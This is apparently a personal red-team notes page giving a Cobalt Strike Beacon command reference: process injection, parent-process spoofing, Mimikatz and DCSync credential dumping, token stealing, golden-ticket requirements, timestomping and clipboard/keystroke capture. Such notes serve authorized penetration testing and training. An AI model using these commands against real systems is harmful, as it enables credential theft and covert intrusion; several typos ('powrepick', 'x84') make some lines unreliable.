👽
ALi3nW3rX
  • 👽ALi3NW3RX - Home Page
  • 🧧Resources
  • MITRE ATT&CK
  • Cyber Kill Chain
  • Education
    • ⚪Training Platforms
      • Attack & Defense
      • Hack The Box
      • Hack The Box Academy
      • Pentester Academy
      • Pentester Lab
      • PortSwigger Academy
      • Proving Grounds (PGP)
      • PwnTillDawn
      • Try Hack Me
    • 🟣Courses
      • Free Courses
        • API Penetration Testing Course
      • Paid Courses
        • OSCP
        • Pentester Academy
          • CRTP
            • CRTP Step By Step In Objectives
              • Obj 1 Enumeration
              • Obj 2 Enumeration
              • Obj 3 Enumeration
              • Obj 4 Enumeration
              • Obj 5 Local Priv Esc
              • Obj 6 BloodHound
              • Obj 7 Derivative Local Admin
              • Obj 8 Golden Ticket / DCSync
              • Obj 9 Silver Ticket for Host
              • Obj 10 Skeleton Key
              • Obj 11 DSRM
              • Obj 12 DCSync
              • Obj 13 Security Descriptors
              • Obj 14 Kerberoast Pass Crack
              • Obj 15 Unconstrained Delegation
            • CRTP Diagrams
          • CRTE
        • Hack The Box
          • CPTS
            • Common Terms (Cheat Sheet)
            • OWASP Top 10 2021
            • ACTIVE DIRECTORY ENUMERATION & ATTACKS
              • Enum Cheat Sheet
              • Tools of The Trade
              • Initial Enumeration of the Domain
              • LLMNR/NBT-NS Poisoning - from Linux
              • LLMNR/NBT-NS Poisoning - from Windows
              • Password Spraying Overview
              • Enumerating & Retrieving Password Policies
              • Password Spraying - Making a Target User List
              • Page 4
              • Page 3
              • Page 1
            • Page 2
  • Reverse Shells
    • revshells.com
  • C2
    • 🔴Cobalt Strike
      • Articles & Instructions
      • Resources
        • CS Cheat Sheet
        • Command Reference
        • Aggressor Scripts
        • RedTeam-OffensiveSecurity
      • Videos
  • WINDOWS
    • Active Directory Attack Map
    • Wadcoms
    • 🟢Recon
    • 🟢Enumeration
      • No Credentials
      • PowerView Enumeration
        • WMI
        • Domain Enumeration
        • Domain Trusts
        • Users
          • Find Local Admin Access
          • Find Active Sessions
        • Groups
        • Computers
        • Shares
        • GPO's
        • OU's
        • ACL's
      • Valid Credentials
    • 🟡FootHold
    • 🟡Local Priv Esc
      • PowerUp
      • ByPasses
      • Local Privilege Escalation
        • Local Priv Esc Using PowerUp.ps1
      • DSRM
    • 🟠Credential Harvesting
      • Dump NTDS.dit
    • 🟠Post Exploitation
    • 🟠Persistence
    • 🔴Domain Priv Esc
      • Domain Privilege Escalation
        • Enterprise Admins
        • DNS Admins
        • Constrained Delegation
        • Unconstrained Delegation
        • Set SPN
        • AS-REPS Roasting
        • Kerberoast
    • 🔴Lateral Movement & Pivoting
      • Lateral Movement
      • PowerShell Remoting
      • Reverse Shells
      • Pass The Hash
      • Over Pass The Hash
    • 🔴Attacks
      • DCSync
      • ACL
      • DSRM
      • AdminSDHolder
      • Print Nightmare
    • 🔴Forests & Trusts
      • Cross Forest Attacks
    • 🔵Defense & Hardening
    • 🔧Tools
      • BloodHound
      • Certipy
      • Commando-VM
      • CrackMapExec
        • CME Quick Reference
        • Protocols
          • SSH
            • Password Spraying
            • Authentication
            • Command Execution
          • MSSQL
            • Password Spraying
            • Authentication
            • Privesc
            • Command Execution
            • Upload/Download
            • Windows Commands
          • LDAP
            • Authentication
            • ASREPRoast
            • Find Domain SID
            • Kerberoasting
            • Unconstrained delegation
            • Admin Count
            • Machine Account Quota
            • Get user descriptions
            • Dump GMSA
            • Exploit ESC8 (ADCS)
            • Extract Subnet
            • LDAP Signing
            • Read DACL rights
          • FTP
            • Password Spraying
          • WINRM
            • Password Spraying
            • Authentication
            • Command Execution
            • LAPS
          • RDP
            • Password Spraying
            • Screenshot (Connected)
            • Screenshot (Not Connected)
        • Using Kerberos
        • Using Modules
        • Using The Database
        • BloodHound Integration
        • Scan for Vulnerabilities
        • Enumeration
          • Hosts
          • Null Sessions
          • Anonymous Login
          • Active Sessions
          • Shares and Access
          • Disks
          • Logged on Users
          • Domain Users
          • Users BruteForce RID
          • Domain Groups
          • Local Groups
          • Password Policy
          • SMB Signing NOT Required
        • Password Spraying
        • Authentication
          • Checking Domain Credentials
          • Checking Local Credentials
        • Command Execution
          • Remote Command Execution
          • Shells
        • Spidering Shares
        • Get and Put Files
        • Obtaining Credentials
          • Dump SAM
          • Dump LSA
          • Dump NTDS.dit
          • Dump LSASS
          • Dump WIFI Password
          • Dump KeyPass
        • LAPS
        • Spooler / WebDAV
        • MS Teams Cookies
      • Forensia
      • Inveigh
      • LaZagne
      • Ligolo / SSH Tunneling
      • LinWinPwn
      • MimiKatz.ps1
        • Golden Ticket
        • Silver Ticket
        • Skeleton Key
      • Rubeus
      • SharpCollection
      • SQLRecon
    • ✍️Scripts
      • FilelessNTDllReflection
      • FilelessRemotePE
      • ExecRemoteAssembly
  • Offensive Programming
    • RUST
      • Links
  • LINUX
    • Linux Terminal Commands
      • Git Cheat Sheet
      • Grep Cheat Sheet
    • Path to Root
    • Bash Cheat Sheet
    • Priv Esc
      • LD_Preload / SETENV
  • WEB APPS
    • Web Apps
      • LFI
      • XXE
  • DATABASES
    • Mysql
    • Postgresql
    • Redis
  • Common Tools & Commands
    • Protocols
      • FTP
      • RDP
      • SMB
      • SSH
    • Primary Tools
      • Hashcat
      • Responder
      • SQLMap
      • Chisel
      • CURL
      • XFREERDP
      • SSH
      • GOBUSTER
      • SNMP
      • NMAP
      • SMBCLIENT
      • WHATWEB
    • Editors
      • VIM
    • Misc Tools
      • ChatGPT
  • NETWORKING
    • Subnetting Cheat Sheet
  • SCRIPTS
    • Enum Scripts
  • MISC
    • Programming
      • GO
        • GoLangBot.Com
        • Ping Sweeper
      • NIM
    • Temp - Notes
Powered by GitBook
On this page
  • Beacons
  • Sleep
  • Command Execution
  • Default
  • powershell.exe
  • powerpick (Using PS w/o powershell.exe)
  • psinject (Using PS within another process)
  • .NET
  • cmd.exe
  • Session Passing
  • Parent Process Modification
  • SMB Beacn
  • TCP Beacn
  • Credentials and Hashes
  • Mimikatz
  • DCSync
  • File Download
  • File Upload
  • Token Stealing
  • Kerberos Tickets
  • Screenshots
  • Keylogging / ClipboardTheft
  1. C2
  2. Cobalt Strike
  3. Resources

Command Reference

Beacons

Sleep

sleep 60 50               ; Sleep 60 sec with 50% of jitter (Call back between 30 to 60 secs randomly)

Command Execution

Default

run [command]

powershell.exe

powershell-import [/path/to/your.ps1]       ; Running it from your localhost
powershell [cmdlet] [args]

powerpick (Using PS w/o powershell.exe)

powrepick [cmdlet] [args]

psinject (Using PS within another process)

psinject [PID] [x86|x64] [cmdlet] [args]

.NET

execute-assembly [/path/to/your.exe]        ; Running it from your localhost

cmd.exe

shell [command] [args]

Session Passing

spawn [x86|x64] [Listener]
inject [PID] [x86|x64] [Listener]

Parent Process Modification

ppid [Choice of your parent process (e.g., iexplore.exe)]
spawnto [x86|x64] [New parent process]

SMB Beacn

spawn [SMB-Listner-Name]                    ; Spawning a peer-to-peer ("P2P") SMB beacon
inject [PID] [x86|x64] [SMB-Listner-Name]   ; Useful when trying to spawn P2P beacon as different user context

TCP Beacn

spawn [TCP-Listner-Name]                    ; Spawning a peer-to-peer ("P2P") TCP beacon
                                            ; TCP beacons can be also run locally by clicking "Bind to localhost only" on GUI
inject [PID] [x86|x64] [TCP-Listner-Name]   ; Useful when trying to spawn P2P beacon as different user context

Credentials and Hashes

logonpasswords                              ; Run Mimikatz
hashdump                                    ; Get SAM database hashes

Mimikatz

mimikatz [command] [args]                   ; Runs a Mimikatz command
mimikatz ![command] [args]                  ; Elevate to SYSTEM and run Mimikatz command
mimikatz @[command] [args]                  ; User current token to run Mimikatz command

DCSync

dcsync [domain] [DOMAIN\user]

File Download

download [file]
cancel [file|*]
downloads
View --> Downloads --> Sync Files

File Upload

upload [/path/to/file]
timestomp [Destination] [Source]            ; Changing file's timestamps (*Do not recommend using it during the engagement)

Token Stealing

ps                                          ; List process
steal_token [PID]                           ; Stealing token
getuid                                      ; Identify/confirm who you are
rev2self                                    ; Drop/revoke token

spawnas DOMAIN\user password                ; Spawn a beacon w/ alternative creds
make_token DOMaIN\user password             ; Create a token. So when you do a make_token, when you do 'whoami' you will
                                            ; still see your current user account; however, if you do a remote 'whoami'
                                            ; (maybe against DC) you will see that the maked token user.

Kerberos Tickets

klist                                       ; See your current Kerberos tray
kerberos_ticket_purge                       ; Purge tickets
kerberos_ticket_user [/path/to/file.ticket] ; Load a ticket

<Golden Ticket>
- Desired user and DOMAIN name
- Domain SID [whoami /user + drop last number]
- NTLM hash of krbtgt user from DC

Screenshots

screenshot [pid] <x84|x64>
screenwatch [pid] <x84/x64>
printscreen

Keylogging / ClipboardTheft

psinject <Process ID> x64 Start-ClipboardMonitor -CollectionLimit 5
PreviousCS Cheat SheetNextAggressor Scripts

Last updated 2 years ago

🔴
Start-ClipboardMonitor.ps1
RedTeam-OffensiveSecurity/README.md at master · bigb0sss/RedTeam-OffensiveSecurityGitHub
Logo